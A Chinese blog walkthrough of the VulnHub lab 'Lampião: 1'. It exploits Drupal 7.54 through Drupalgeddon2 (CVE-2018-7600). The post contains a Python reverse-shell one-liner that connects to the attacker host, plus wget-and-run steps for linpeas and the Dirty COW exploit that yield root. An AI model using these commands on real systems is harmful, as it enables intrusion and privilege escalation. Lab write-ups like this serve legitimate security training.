vulnhub Lampião: 1

于 2022-07-25 21:59:40 发布
阅读量567 收藏
点赞数
分类专栏: vulnhub 文章标签: dirtycow drupal CHANGELOG 脏牛 python反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/125984074
版权

渗透思路:

nmap扫描发现端口,robots.txt以及Drupal大致版本 ---- 通过CHANGELOG进一步确认Drupal版本 ---- 利用Drupal 7的RCE(CVE-2018-7600)getshell(无需认证)---- 获取python反弹shell ---- 脏牛提权

环境信息:

靶机:192.168.101.89

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.89

扫描到TCP 22(ssh)、80、1898(http)端口,其中还识别出1898端口使用了Drupal 7,还发现了该端口下有robots.txt

2、通过CHANGELOG进一步确认Drupal版本

浏览器访问http://192.168.101.89:1898/robots.txt,发现Disallow的一堆文件中有/CHANGELOG.txt

访问http://192.168.101.89:1898/CHANGELOG.txt,发现当前Drupal版本应该是7.54

3、利用Drupal 7的RCE(CVE-2018-7600)getshell(无需认证)

exploit-db中搜索drupal 7,排除掉需要认证的exp,最后根据exp利用的url可否访问锁定不需要认证的RCE:“Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution”

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution - PHP webapps Exploit

将exp(44449.rb)下载下来,注释掉“require 'highline/import'”(因为没用到,且如果不注释掉会报错),其他不修改

在命令行中执行

ruby 44449.rb http://192.168.101.89:1898/

得到靶机www-data用户的shell

4、获取python反弹shell

很可惜上面的shell不能切换目录,所以考虑用反弹shell命令获取另一个反弹shell

又由于该shell中不能重定向(>),所以用不包含重定向符号的python语句获取反弹shell

首先攻击机上nc监听8888端口

nc -nlvp 8888

然后在上一步得到的shell中执行

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.101.34",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

即可获得靶机www-data用户的反弹shell

5、脏牛提权

攻击机上linpeas.sh所在文件夹起http服务

python2 -m SimpleHTTPServer 80

靶机上执行如下命令,从攻击机下载linpeas.sh,添加可执行权限,并执行

wget http://192.168.101.34/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

linpeas.sh识别出高危内核版本Linux version 4.4.0-31-generic

并给出几个很可能成功提权的exp,逐个尝试之后,发现dirtycow的exp(https://www.exploit-db.com/download/40847)好使

将exp 40847.cpp下载到攻击机上,然后在靶机上执行如下命令,从攻击机上下载40847.cpp,编译,赋予可执行权限并执行

wget http://192.168.101.34/40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
chmod +x dcow
./dcow

执行后提示:Root password is: dirtyCowFun

说明攻击成功,现在可以su到root,密码为dirtyCowFun

获得root的shell后,在/root目录下可以找到flag.txt

题外话:

1、40847.cpp会在/etc/passwd写入root的新密码,而原始的/etc/passwd被备份为/etc/passwd-

2、关于脏牛

网站:Dirty COW (CVE-2016-5195)

poc集:PoCs · dirtycow/dirtycow.github.io Wiki · GitHub

仙女象
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
3.100个渗透测试实战#3(Lampiao)
qwsn
03-23 2299
目录 一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现 1.查看kali的网卡和IP信息;(网卡名:eht0;IP:192.168.97.129) 2.查看靶机页面; 3.探测特定网络内的,主机存活状态(netdiscover、arp-scan、nmap) 4.分析所得: (二)信息收集——端口(服务)扫描 1.扫描端口,以及端口对应的服务信息,以及靶机的操...
vulnhub靶场之THALES: 1
「 虚幻私塾」
10-30 737
在.ssh下发现密匙:id_rsa文件,将密匙文件复制保存到本地文件upfine,然后命令:python2 /usr/share/john/ssh2john.py /home/kali/Desktop/upfine > passwd生成密码本,然后命令:john --wordlist=/usr/share/wordlists/rockyou.txt passwd进行破解,成功获取密码:vodka06。切换thales账户:su thales,读取下user.txt文件,成功获取到flag信息。
mysql 登录及创建账号与导入导出命令
rogerxue12345的博客
06-24 3054
一、mysql服务的启动和停止 mysql> net stop mysql mysql> net start mysql 二、登陆mysql mysql> 语法如下: mysql -u用户名 -p用户密码 如果是连接到另外的机器上,则需要加入一个参数-h机器IP mysql -uroot -ph3croot -h192.168.101.89 -P13308 三、增加...
DC: 1
箭雨镜屋
06-13 536
渗透思路:nmap扫描----利用Drupal 7的RCE(CVE-2018-7600)getshell----python反弹shell----非渗透路径:Drupal配置文件中找到数据库用户名密码----非渗透路径:数据库中找到flag3、/home/flag4下发现flag4----suid权限的find命令提权...
如何查看drupal版本
weixin_33790053的博客
12-12 1742
方法如下: 1.进入后台。 2.依次点击“管理”-“日志”-“状态报告” 即可显示。 转载于:https://www.cnblogs.com/niuch/archive/2008/12/12/1353761.html...
DC-1 靶机渗透测试(拿shell,提权)
single_g_l的博客
03-17 5058
目录 一. 环境 二. 信息收集 1. 主机发现 2.访问 192.168.1.184:80 三. 利用msfconsole 攻击(拿到flag1) 1. 漏洞利用成功 2. 进入会话 ,拿到flag1.txt ---shell ​四. 找到配置文件,获取flag2 五. 修改管理员密码,登录网站,拿到flag3 1. 获取交互式shell, 执行MySQL语句 2. 查看管理员用户 3. 修改管理员密码 六. 用find语句,找到flag4 七. SUID提权,获取...
LamPI-2.0:支持 Z-Wave 的 LamPI-2.0
06-25
这是用于 433MHz 接收器的 RaspberryPI 控制器 LamPI 的存储库。 (c) 2014 年; Maarten Westenberg (又名 Platenspeler) mw12554 @ hotmail.com LamPI 最初是作为 klikaanklikuit(.nl) ICS-1000 控制器的替代 Web ...
lampi:灯-物联网智能灯
04-24
Lampi-物联网智能灯此存储库包含我的Lampi(已连接的智能灯)的代码。 该代码取自EECS 377 Connected Devices类,但经过修改可以长期运行。 它没有实现任何数据分析或安全性部分以使进一步开发变得容易。 我想尝试...
lampi:适用于Ubuntu的LAMP安装程序
02-06
**1. Linux**:作为LAMP堆栈的基础,Linux是开源的操作系统,Ubuntu是其一个流行的发行版,以其用户友好性和稳定性而闻名。Ubuntu基于Debian,提供了丰富的软件包管理系统和自动更新功能。 **2. Apache**:Apache ...
Drupal 7.31SQL注入getshell漏洞利用详解及EXP
weixin_33759269的博客
11-25 1070
0x00 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp不再深入下去。   0x01 关于漏洞的原理和POC在我的博客上已经有文章进行解释,这里只是着重说一下利用过程。配合POC的效果,我主要是从远程代码执行和GetShell方面去做的利用。 远程代码执行利用: 1...
检查 Drupal 版本「Check Drupal Version」-crx插件
03-09
此扩展显示安装在站点中的drupal版本。 *该插件将有助于所有开发人员查找特定站点的当前Drupal版本。 *我们可以轻松地确定该站点是在D6还是D7中构建的。 *此Chrome扩展程序对于Drupal开发人员以及其他人单击一次即可识别版本很有帮助。 -Manikandan拥有和维护的Cognizant技术解决方案。 支持语言:English
Drupal 7.31最新SQL Injection漏洞利用脚本支撑库文件
10-23
Drupal 7.31最新SQL Injection漏洞利用脚本支撑库文件 具体利用方法可以参见http://blog.csdn.net/kikaylee/article/details/40400643
1.100个渗透测试实战#1(DC—1)
qwsn
03-19 4697
目录 一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现 1.查看kali的网卡和IP信息;(网卡名:eth0;IP:192.168.97.129) 2.查看靶机页面; 3.探测主机的存活状态(netdiscover、arp-scan 、nmap); (二)信息收集——端口(服务)扫描 1.扫描端口,以及端口对应的服务信息,以及靶机的操作系统信息; 2.分析所...
Drupal 7.31版本最新漏洞利用个人完整总结,共享出来(附上利用源码)
kikaylee的专栏
10-23 8398
10月16日有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。
如何判断一个drupal站用的是哪个版本
文本魔术
11-30 3806
参见 http://willy.boerland.com/myblog/fingerprinting_a_drupal_iste_what_version_is_that_site_running
drupal 查看版本_EntityFieldQuery的Drupal 8版本
culh2177的博客
08-19 384
drupal 查看版本Even though Drupal 7 core fell short of a proper way of handling its brand new entity system (we currently rely on the great Entity module for that), it did give us EntityFieldQuery. For th...
drupal显示摘要版本
Town
08-12 1181
$body = field_get_items('node', $node, 'body'); $teaser= $body[0]['safe_summary']; print $teaser;
Excel Vba无法连接 远程 Mysql数据库问题的解决方法
weixin_42799489的博客
09-10 3586
1、使用的环境 excel 2016 32位 远程服务器数据库,有公网ip 使用的是xampp 套件,包含apache+php+MariaDB 10.1.34(这个和mysql兼容,可以看作mysql,不是无法连接的原因所在。 2、问题描述 使用vba 语句连接远程数据库 Sub dd() Dim cn As ADODB.Connection '定义数据链接对象 ,保存连接数据库信息...
lampiao靶机下载
最新发布
04-18
很抱歉,我无法提供关于"Lampião靶机"的下载信息。Lampião靶机是一个用于网络安全学习和实践的虚拟机镜像,它包含了一系列的漏洞和攻击场景,供安全从业人员进行实验和学习。然而,由于安全和法律的考虑,我不能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值